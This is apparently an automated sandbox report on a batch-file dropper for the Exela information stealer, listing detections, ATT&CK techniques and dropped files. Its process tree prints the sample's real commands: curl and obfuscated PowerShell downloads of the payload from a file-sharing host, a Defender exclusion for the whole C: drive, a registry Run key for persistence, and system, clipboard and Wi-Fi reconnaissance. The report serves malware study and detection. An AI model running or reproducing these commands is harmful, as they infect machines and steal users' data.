Analysis
-
max time kernel
147s
-
max time network
153s
-
platform
windows10-2004_x64
-
resource
win10v2004-20240426-en
-
resource tags
arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
-
submitted
24-05-2024 13:50
Static task
static1
Behavioral task
behavioral1
Sample
Bat Ayar.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Bat Ayar.bat
Resource
win10v2004-20240426-en
General
-
Target
Bat Ayar.bat
-
Size
684B
-
MD5
26bfcd76c6d78dccdf22716f13087ec6
-
SHA1
07e02f656c097569c29f7d01e76632d0b90fd3d9
-
SHA256
6eba1ec75ca86382fddebdca5e2ac3c00e0793af58ff74b9e9042f7297cbb214
-
SHA512
0696ec540605451d7888840c9e59a4711a6585302f8f69a3c3032aba72c689ca087918fe1c4f96e6943689f5f21178be68711980db8eb19f12dfe29854bbfeb9
Malware Config
Signatures
-
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
flow  pid  process
34  4156  powershell.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
pid  process
3888  powershell.exe
4156  powershell.exe
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 4 IoCs
Processes:
pid  process
4992  netsh.exe
392  netsh.exe
4336  netsh.exe
2800  netsh.exe
-
Deletes itself 1 IoCs
Processes:
pid  process
2740  Discord.exe
-
Executes dropped EXE 4 IoCs
Processes:
pid  process
5012  Discord.exe
2740  Discord.exe
4744  Discord.exe
4380  Discord.exe
-
Loads dropped DLL 62 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
description  ioc  process
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe"  reg.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe"  reg.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs
Processes:
flow  ioc
105  discord.com
70  discord.com
74  discord.com
104  discord.com
75  discord.com
102  discord.com
103  discord.com
106  discord.com
71  discord.com
72  discord.com
73  discord.com
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
66  ip-api.com
-
Launches sc.exe 2 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid  process
2384  sc.exe
1468  sc.exe
-
Detects Pyinstaller 1 IoCs
Processes:
resource  yara_rule
C:\Users\Admin\AppData\Local\Anon\Discord.exe  pyinstaller
-
Collects information from the system 1 TTPs 2 IoCs
Uses WMIC.exe to find detailed system information.
-
Enumerates processes with tasklist 1 TTPs 8 IoCs
Processes:
pid  process
3184  tasklist.exe
3048  tasklist.exe
4728  tasklist.exe
2400  tasklist.exe
5108  tasklist.exe
4348  tasklist.exe
4380  tasklist.exe
4304  tasklist.exe
-
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
Processes:
pid  process
3180  NETSTAT.EXE
3348  ipconfig.exe
1928  NETSTAT.EXE
3364  ipconfig.exe
-
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
Processes:
pid  process
2804  systeminfo.exe
4816  systeminfo.exe
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
pid  process
3888  powershell.exe
3888  powershell.exe
4156  powershell.exe
4156  powershell.exe
4284  powershell.exe
4284  powershell.exe
4284  powershell.exe
3988  powershell.exe
3988  powershell.exe
3988  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Bat Ayar.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl --silent -o "C:\Users\Admin\AppData\Local\x.bat" "https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_8f72998e-f00f-4791-a5f6-69f9632a5810/807f63b2-f4f1-47e6-be8c-c81768b31a33/2241243d-65c3-489d-a4f1-8aab4534313a?temp_url_sig=8810de06efeeef271a4a696e3d87f4220a010c48c7eb331723b024c7526e7193&temp_url_expires=1716414925409&filename=x.bat"2⤵
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c A"d"d-MpP"r"efe"r"ence -ExclusionPath "C:\"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "I"n"v"o"k"e"-W"e"b"r"e"q"u"e"st 'https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_8f72998e-f00f-4791-a5f6-69f9632a5810/da16ca16-b253-4073-9d27-a0f73970cb38/5706b294-04be-4fe4-b0d1-0faa703891f2?temp_url_sig=90553fd6b593455748cd8c42d5514517cb3bcda7c7cee3baa65de43cc7d47bed&temp_url_expires=1716414897486&filename=Exela.exe' -O"u"t"F"i"l"e Discord.exe"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Anon\Discord.exeDiscord.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Anon\Discord.exeDiscord.exe3⤵
- Deletes itself
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"5⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f5⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c chcp5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c chcp5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
-
C:\Windows\system32\HOSTNAME.EXEhostname5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername5⤵
- Collects information from the system
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet user5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user6⤵
-
C:\Windows\system32\query.exequery user5⤵
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"6⤵
-
C:\Windows\system32\net.exenet localgroup5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup6⤵
-
C:\Windows\system32\net.exenet localgroup administrators5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators6⤵
-
C:\Windows\system32\net.exenet user guest5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest6⤵
-
C:\Windows\system32\net.exenet user administrator5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command5⤵
-
C:\Windows\system32\tasklist.exetasklist /svc5⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\ipconfig.exeipconfig /all5⤵
- Gathers network information
-
C:\Windows\system32\ROUTE.EXEroute print5⤵
-
C:\Windows\system32\ARP.EXEarp -a5⤵
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano5⤵
- Gathers network information
-
C:\Windows\system32\sc.exesc query type= service state= all5⤵
- Launches sc.exe
-
C:\Windows\system32\netsh.exenetsh firewall show state5⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall show config5⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Anon\Discord.exe"C:\Users\Admin\AppData\Local\Anon\Discord.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Anon\Discord.exe"C:\Users\Admin\AppData\Local\Anon\Discord.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f4⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵
-
C:\Windows\system32\chcp.comchcp5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵
-
C:\Windows\system32\chcp.comchcp5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"3⤵
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
-
C:\Windows\system32\HOSTNAME.EXEhostname4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername4⤵
- Collects information from the system
-
C:\Windows\system32\net.exenet user4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user5⤵
-
C:\Windows\system32\query.exequery user4⤵
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"5⤵
-
C:\Windows\system32\net.exenet localgroup4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup5⤵
-
C:\Windows\system32\net.exenet localgroup administrators4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators5⤵
-
C:\Windows\system32\net.exenet user guest4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest5⤵
-
C:\Windows\system32\net.exenet user administrator4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command4⤵
-
C:\Windows\system32\tasklist.exetasklist /svc4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\ipconfig.exeipconfig /all4⤵
- Gathers network information
-
C:\Windows\system32\ROUTE.EXEroute print4⤵
-
C:\Windows\system32\ARP.EXEarp -a4⤵
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano4⤵
- Gathers network information
-
C:\Windows\system32\sc.exesc query type= service state= all4⤵
- Launches sc.exe
-
C:\Windows\system32\netsh.exenetsh firewall show state4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall show config4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"3⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Account Manipulation 1
Create or Modify System Process 1
Windows Service 1
Boot or Logon Autostart Execution 1
Registry Run Keys / Startup Folder 1
Privilege Escalation
Create or Modify System Process 1
Windows Service 1
Boot or Logon Autostart Execution 1
Registry Run Keys / Startup Folder 1
Downloads
C:\Users\Admin\AppData\Local\Anon\Discord.exe (Filesize: 9.5MB)
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (Filesize: 2KB)
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (Filesize: 944B)
C:\Users\Admin\AppData\Local\Temp\HistoryData.db (Filesize: 152KB)
C:\Users\Admin\AppData\Local\Temp\HistoryData.db (Filesize: 124KB)
C:\Users\Admin\AppData\Local\Temp\Web.db (Filesize: 116KB)
C:\Users\Admin\AppData\Local\Temp\Web.db (Filesize: 100KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\VCRUNTIME140.dll (Filesize: 106KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_asyncio.pyd (Filesize: 34KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_bz2.pyd (Filesize: 46KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_cffi_backend.cp310-win_amd64.pyd (Filesize: 71KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_ctypes.pyd (Filesize: 56KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_hashlib.pyd (Filesize: 33KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_lzma.pyd (Filesize: 84KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_overlapped.pyd (Filesize: 30KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_socket.pyd (Filesize: 41KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_sqlite3.pyd (Filesize: 48KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_ssl.pyd (Filesize: 60KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_uuid.pyd (Filesize: 21KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_helpers.cp310-win_amd64.pyd (Filesize: 26KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_http_parser.cp310-win_amd64.pyd (Filesize: 80KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_http_writer.cp310-win_amd64.pyd (Filesize: 24KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_websocket.cp310-win_amd64.pyd (Filesize: 19KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\base_library.zip (Filesize: 812KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\cryptography\hazmat\bindings\_rust.pyd (Filesize: 2.0MB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\frozenlist\_frozenlist.cp310-win_amd64.pyd (Filesize: 36KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\libcrypto-1_1.dll (Filesize: 1.1MB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\libffi-7.dll (Filesize: 23KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\libssl-1_1.dll (Filesize: 203KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\multidict\_multidict.cp310-win_amd64.pyd (Filesize: 20KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\python3.DLL (Filesize: 63KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\python310.dll (Filesize: 1.4MB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\select.pyd (Filesize: 24KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\sqlite3.dll (Filesize: 608KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\unicodedata.pyd (Filesize: 287KB)
C:\Users\Admin\AppData\Local\Temp\_MEI50122\yarl\_quoting_c.cp310-win_amd64.pyd (Filesize: 40KB)
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dmz51mey.uf2.ps1 (Filesize: 60B)
C:\Users\Admin\AppData\Local\x.bat (Filesize: 1KB)